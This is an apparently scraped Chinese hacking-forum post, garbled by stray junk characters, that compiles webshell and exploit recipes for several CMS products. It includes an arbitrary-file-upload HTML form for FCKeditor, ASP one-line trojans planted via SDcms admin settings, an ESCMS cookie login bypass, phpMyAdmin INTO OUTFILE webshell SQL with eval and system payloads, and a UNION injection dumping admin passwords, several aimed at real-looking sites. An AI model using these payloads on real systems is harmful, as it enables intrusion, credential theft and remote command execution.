Y I4 |! r. Z) t. r如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
, f5 @. \4 A# G& k' ]<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
" w4 S: F! h7 V2 FUpload a new file:<br>
, U) E% ~+ a, A% G. d<input type="file" name="NewFile" size="50"><br>
6 o) [! {2 N9 y2 X<input id="btnUpload" type="submit" value="Upload">/ F- p; _. ` l
</form>
" ]/ v/ s' H7 N-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, h ]( R( ]4 u3 K4 t# w! y/ c
3 l: k, @4 s, a, A1 P( w$ x# X
SDcms 后台拿webshell* x: P7 ? N" n' C Z( h
" \7 Z. g3 x) `8 O- E, s* N7 l第一种方法:" _- M4 r# Q( `* [
进入后台-->系统管理-->系统设置-->系统设置->网站名称;$ o: C# K! x- d, a L4 a; o0 f. P
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx' T. b) `. g( Q; Z* `7 K5 c
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。& R( y" a: ~" U, P: q
第二种方法:
' H: h# j& m- s5 j& N: |进入后台-->系统管理-->系统设置-->系统设置->上传设置;; h( }& \& [. T% e$ Z* n6 A
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!/ ?, a; F, g8 `+ z. o
第三种方法:0 i7 E. p u" D- c
进入后台-->界面管理-->模板文件管理-->创建文件& ^2 {0 n6 N1 T; W, t4 M
文件名写入getshell.ashx
$ ?% A) T" Z7 u内容写入下面内容:
. X: F; f0 k- @( J% Q/====================复制下面的=========================/
! s8 l6 Z: X# ~$ |4 l1 c' d<%@ WebHandler Language="C#" Class="Handler" %>
5 w, \7 ? j& q6 E1 r0 S! Eusing System;: q R% ?8 |0 T2 T' f! O
using System.Web;( d S# d) w7 q6 I. y/ `
using System.IO;$ M% ~, ?: m) ]* O% Y1 E' }
public class Handler : IHttpHandler {) x2 M' V+ B, m9 J' n. A; y
public void ProcessRequest (HttpContext context) {5 h) m0 h. i6 C" x' ~2 z B
context.Response.ContentType = "text/plain";* q6 t3 t$ O, z
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));" a" C7 w5 B9 G! h: X6 H
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");' L. Q# F; Q; q( H
file1.Flush();7 i4 T' d$ y4 Y) d9 e: E" K! D
file1.Close();
8 e2 @8 W3 j1 w: u}
$ V+ m% V6 {* C- v7 k: lpublic bool IsReusable {
' Y) w6 ~+ ~! O2 n8 d8 ~get {
7 ]8 W: u9 o, N# i- I* ureturn false;
, _, h1 `5 I" ?$ o `5 W/ x}
: V2 z5 S: H3 @( T, v7 y0 I}
% t) {( P, \+ i% D% ] s- l}' r) q# B' m { n
/=============================================/
* g4 R: D. w5 i0 K8 L: T$ F访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx$ D# @$ {. h+ l2 r5 ]2 W
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
, \6 ?; z/ g# w6 g2 s( n* [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 m# l" L- U3 S# T! f( \" }* a2 \; ^+ K! K; n+ Y4 k
ESCMS网站管理系统0day
! p) J; M) Z+ K" q
5 f x! T0 U3 w. R0 B后台登陆验证是通过admin/check.asp实现的
0 m6 J2 h& B4 P( H! L1 `: A! r& P( T* l8 m. X3 e
首先我们打开http://target.com/admin/es_index.html, g* ?0 ]% l: E
然后在COOKIE结尾加上
2 v* v; V$ t9 i; ESCMS$_SP2=ES_admin=st0p;( ?1 ~& G: i3 q
修改,然后刷新' A4 }( [2 g3 N& P+ c) N
进后台了嘎..
5 y. u7 c! r" g; |' b然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
: G X, a1 v' c% M
* c+ l: e% c( A( _' r6 \7 W利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.6 U2 @- v$ l) X# t/ M
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
$ z! U5 B! f. K5 }- @4 t! N存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..5 c) e2 T- U. {* K
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
; H" v6 Y! S, g5 Q------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' F9 p8 w$ w+ o" F# `3 i8 L
' j+ Z9 X; V% q9 A- Y/ l8 k4 s8 w宁志网站管理系统后台无验证漏洞及修复
: |7 i+ J: C2 q) C; p
7 V/ a9 l. g3 N$ t3 k网上搜了一下,好像没有发布.如有雷同纯粹巧合!
8 H* |$ z8 o) w官方网站:www.ningzhi.net1 r1 H; L9 j: t- Q! I' ?- X
学校网站管理系统 V.2011版本 1 k; W" r. Q, Y+ U* x2 Z
http://down.chinaz.com/soft/29943.htm
' X- i. S# W5 U- `其它版本(如:政府版等),自行下载.
+ a' i3 f, M6 e7 W6 v3 } z漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~0 S5 Y; P, _. }9 t0 z- E8 Y+ J
login.asp代码如下:# h" p' O$ r; a2 h2 E7 O5 w( T/ \
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
7 G R6 @& H/ Y- \# D( l; N; umanage.asp代码我就不帖出来了.反正也没验证.3 w+ {( e6 P1 Q4 U% [& v) o
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
- P; @: Y* u$ A% [漏洞利用:
# ?5 p7 i* U8 l0 { y N直接访问http://www.0855.tv/admin/manage.asp
- I1 l) E. c- K8 [5 g: }/ c数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
. E* e- ], P* |; T2 u: m----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 K/ e7 z- g2 T) F ]
/ l r% e1 e9 fphpmyadmin拿shell的四种方法总结及修复( |, g5 V# h" c' c! L
5 N8 P$ w. K+ H
方法一: D2 z6 P0 w; n) {
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
" ^ p3 ~; k$ v6 I0 F F \INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');8 A$ m1 N0 N1 U0 c
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';* K7 b6 p1 o( j: z8 e8 S0 `
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
- j) @; F! ?1 D' I% O 一句话连接密码:7on
0 U, J7 X/ h, S7 L' A方法二:
' a o0 J+ k! H2 C5 G: M读取文件内容: select load_file('E:/xamp/www/s.php');
2 V/ z2 D7 i% Q- _# A写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'1 a% b( ?7 d& s) \3 B) {9 Z! O
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: G6 p% X+ C! y( Y8 O- m方法三:# d. ~9 \$ E; L$ S! m0 s) j) s
JhackJ版本 PHPmyadmin拿shell
+ S- Z6 @) `0 {# D) HCreate TABLE study (cmd text NOT NULL);; f! F0 l% U0 u0 A
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
9 I/ P: n9 |" Q; }select cmd from study into outfile 'E:/wamp/www/7.php';
" f0 H' M9 D3 V% g1 gDrop TABLE IF EXISTS study;- U) W6 }% m1 ?) a
<?php eval($_POST[cmd])?>
m8 n, ~( j z0 }2 fCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。/ B8 F( t1 i; }; @% M; p# ^
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
$ I7 r: K7 }% ]% q9 C: k# SSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
+ u O$ I6 K9 P J6 V0 f3 FDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
+ A8 w1 J8 R$ F9 D' W1 e方法四:" k, R( }- s. m# u/ B# ]
select load_file('E:/xamp/www/study.php');
$ P2 L# w' K6 n# X' zselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
( [# K( h+ d1 n+ G6 T. G. ?" H然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
3 K4 I3 C1 v$ Y+ ]1 j1 g-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
: l) N- { [ d9 H4 L' T5 f; _ q" g
1 {, }+ k# x |: O; s: VNO.001中学网站管理系统 Build 110628 注入漏洞) H& K V/ d4 B( n
! E& U [0 |5 p+ \$ C+ L$ q$ bNO.001中学网站管理系统功能模块:
0 Q+ u' ^* A# r* X1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
8 n4 D u+ S# S( n* U& `2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息 T0 o( v0 C. B2 L
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息8 o) }+ S) G- b( o: }, n; K% a
4.视频图片管理:一级分类,动态添加视频或者图片等信息
( L6 `2 s' D. J' G5 n9 l5.留言管理:对留言,修改,删除、回复等管理
" `9 T0 X+ `0 a* l0 m+ L6.校友频道:包括校友资料excel导出、管理等功能
6 d- a1 k( U: Q/ x" o; l7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页/ a/ c2 O8 J& h' M
默认后台:admin/login.asp
" p$ ?# j3 h" N官方演示:http://demo.001cms.net
# h6 v! D2 R& ?# V" q源码下载地址:http://down.chinaz.com/soft/30187.htm
& \/ Q0 T& q _/ l- w" _# }EXP:. o# I9 J* Z. l: g& T9 \ n5 ]
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin4 P. F" Z/ z* X; A+ x( o
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! k' e) ], I& T, L: z# egetshell:后台有备份,你懂的
# |$ |; `( u4 q | i1 G另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
6 Z7 N2 {9 k6 E' ~1 }0 O------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对